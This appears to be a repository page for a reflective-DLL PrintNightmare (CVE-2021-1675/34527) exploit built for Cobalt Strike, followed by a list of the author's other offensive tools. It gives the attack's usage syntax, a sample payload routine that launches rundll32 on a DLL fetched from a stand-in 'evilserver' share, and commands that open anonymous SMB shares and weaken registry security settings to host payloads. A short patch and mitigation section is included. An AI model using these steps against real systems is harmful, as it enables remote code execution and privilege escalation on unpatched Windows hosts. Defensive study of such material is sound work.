• Stars
    star
    331
  • Rank 127,323 (Top 3 %)
  • Language
    C
  • Created over 3 years ago
  • Updated over 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PrintNightmare exploit

CVE-2021-1675 / CVE-2021-34527 exploit.

Reflective Dll implementation of the PrintNightmare PoC by Cornelis de Plaa (@Cneelis). The exploit was originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370).

  • It can be used as Remote Code Execution (RCE) exploit (screenshot 1),
  • It can be used for Privilege Escalation (screenshot 2).

This implementation has some advantages compared to other public exploits:

  • It uses MS-PAR protocol instead of MS-RPRN (credits @cube0x0).
  • It is in Reflective DLL form, so can be used directly from Cobaltstrike or other C2 framework.
  • It automatically finds the path of the printer driver.

Usage

Within Cobaltstrike Beacon console:

PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]

The payload DLL is started by spoolsv.exe (print spool service) from DllMain and should thus avoid API calls which require synchronisation to avoid deadlocks. We recommend to let this payload DLL perform a CreateProcess call to something like this:

void NothingToSeeHere() {
	STARTUPINFO sui;
	PROCESS_INFORMATION pi;

	RtlZeroMemory(&sui, sizeof(sui));
	RtlZeroMemory(&pi, sizeof(pi));
	sui.cb = sizeof(sui);

	GetStartupInfo(&sui);
	LPCWSTR lpwApplicationName = L"C:\\Windows\\System32\\rundll32.exe";
	LPWSTR lpwCommandLine = (LPWSTR)L"C:\\Windows\\System32\\rundll32.exe \\\\evilserver\\thankyou\\c2payload.dll,MyExport";

	if (!CreateProcess(lpwApplicationName, lpwCommandLine, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &sui, &pi)) {
		return;
	}

	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);

	return;
}

Screenshot 1: using this exploit for RCE

Screenshot 2: using this exploit for LPE

SMB server configuration

Source: https://github.com/cube0x0/CVE-2021-1675#smb-configuration

Easiest way to host payloads is to use samba and modify /etc/samba/smb.conf to allow anonymous access:

[global]
     map to guest = Bad User
     server role = standalone server
     usershare allow guests = yes
     idmap config * : backend = tdb
     smb ports = 445
[smb]
     comment = Samba
     path = /tmp/
     guest ok = yes
     read only = no
     browsable = yes
     force user = smbuser

From windows it's also possible:

mkdir C:\share
icacls C:\share\ /T /grant Anonymous logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

Compile instructions:

This project is written in C and assembly. You can use Visual Studio to compile it from source. We are not releasing binaries, so you will have to compile yourself.

Mitigation

In July 2021 Microsoft released an emergency update to fix the PrintNightmare vulnerability (CVE-2021-34527). Make sure you run Windows update and install the following update:

  • Version 21H1, 20H1, 2004 – KB5004945 (Build 19043.1083).
  • Version 1909 – KB5004946 (Build 18363.1646).
  • Version 1809 and Windows Server 2019 – KB5004947 (Build 17763.2029).
  • Version 1803 – KB5004949
  • Version 1507 – KB5004950.
  • Windows 8.1 and Windows Server 2012 – KB5004954 and KB5004958 (security only).
  • Windows 7 SP1 and Windows Server 2008 R2 SP1 – KB5004953 and KB5004951 (security only)
  • Windows Server 2008 SP2 – KB5004955 and KB5004959 (security only).

For more information, see Microsoft guidance:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

This patch also offers the ability to prevent non-administrators from installing any print drivers on a print server (incl. signed drivers), by configuring the “RestrictDriverInstallationToAdministrators” registry value. For information on this option, see:

https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7

Other option to mitigate the PrintNightmare vulnerability includes:

  • Disable Print Spooler service‍ (on Domain Controllers & non-print servers)‍.
  • Disable inbound remote printing through Group Policy.
  • Block inbound connectivity using a firewall.
  • Ensure Point and Print installation prompts are enabled.

More Repositories

1

RedELK

Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
Python
2,342
star
2

EvilClippy

A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.
C#
2,095
star
3

Dumpert

LSASS memory dumper using direct system calls and API unhooking.
C
1,464
star
4

C2-Tool-Collection

A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques.
C
1,090
star
5

Invoke-ADLabDeployer

Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
PowerShell
477
star
6

SharpHide

Tool to create hidden registry keys.
C#
463
star
7

Spray-AD

A Cobalt Strike tool to audit Active Directory user accounts for weak, well known or easy guessable passwords.
C++
419
star
8

Ps-Tools

Ps-Tools, an advanced process monitoring toolkit for offensive operations
C
327
star
9

Excel4-DCOM

PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
PowerShell
321
star
10

Recon-AD

Recon-AD, an AD recon tool based on ADSI and reflective DLL’s
C++
312
star
11

InlineWhispers

Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)
Assembly
299
star
12

Scripts

Small scripts that make life better
JavaScript
289
star
13

FindObjects-BOF

A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.
266
star
14

WdToggle

A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.
213
star
15

edr-internals

Tools for analyzing EDR agents
C++
191
star
16

Zipper

Zipper, a CobaltStrike file and folder compression utility.
C
189
star
17

HelpColor

Agressor script that lists available Cobalt Strike beacon commands and colors them based on their type
188
star
18

TamperETW

PoC to demonstrate how CLR ETW events can be tampered.
C
186
star
19

Presentations

Presentation material presented by Outflank team members at public events.
177
star
20

NetshHelperBeacon

Example DLL to load from Windows NetShell
C++
174
star
21

Net-GPPPassword

.NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
C#
163
star
22

external_c2

POC for Cobalt Strike external C2
C
122
star
23

DoH_c2_Trigger

Code for blogpost: https://outflank.nl/blog/2018/10/25/building-resilient-c2-infrastructues-using-dns-over-https/
PowerShell
54
star
24

Training-MSOfficeOffensiveTradecraft

Info related to the Outflank training: Microsoft Office Offensive Tradecraft
50
star
25

unmanaged-dotnet-patch

Modify managed functions from unmanaged code
C++
50
star
26

PasswordDump2ELK

Clean public password dump files and store in ELK
Shell
36
star
27

RedELK-workshop

Items related to the RedELK workshop given at security conferences
25
star
28

Exploits

Exploits developped by Outflank B.V. team members
Python
21
star
29

RedFile

Serving files with conditions, serverside keying and more.
Python
19
star
30

Invoke-Templator

A PowerShell script to parse the docx/docm file format and update the template location.
PowerShell
17
star